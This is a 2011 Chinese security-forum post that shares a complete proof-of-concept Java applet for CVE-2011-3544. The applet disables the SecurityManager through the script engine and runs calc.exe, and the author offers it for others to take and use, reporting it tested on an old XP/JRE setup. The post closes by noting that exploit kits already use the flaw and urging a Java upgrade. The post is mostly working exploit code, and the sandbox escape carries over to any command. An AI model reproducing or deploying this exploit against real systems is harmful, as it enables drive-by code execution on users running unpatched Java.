新鲜出炉 - CVE-2011-3544 POC

标题：新鲜出炉 - CVE-2011-3544 POC
作者：古河
时间：2011-11-30 14:45:24
链接：http://bbs.pediy.com/showthread.php?t=143576

老外发现的，详细描述看他的blog:http://schierlm.users.sourceforge.ne...2011-3544.html
这个老外很有趣，把细节讲的这么详细了，却不肯给出POC，说怕被坏人利用 ~~~
大哥，真怕被坏人利用乃就不要讲的这么详细好不好啊~

自己构造了个POC，要的拿去玩，反正迟早要进metaspolit

代码:

import java.applet.Applet;

import javax.script.*;

import javax.swing.JList;

public class ScriptEngineExp extends Applet {

  
  private JList list;
  
    public void init() {

        try {

            ScriptEngine se = new ScriptEngineManager().getEngineByName("js");
            
            se.eval("var error = new Error(\"My error\");" +
                "this.toString = function(){ " +
                "java.lang.System.setSecurityManager(null);" +
                "java.lang.Runtime.getRuntime().exec(\"calc.exe\");" +
                "return \"exploit!\";};" +
                "error.message = this;");
        
            list = new JList(new Object[]{se.get("error")});
            
            this.add(list);

        } catch (ScriptException ex) {

            ex.printStackTrace();

        }

    }


}

windows xp sp2 + jre1.6.27测试通过

大家机子上有Java的，最好升级到最新版本，已经有exploit kit在用这个漏洞了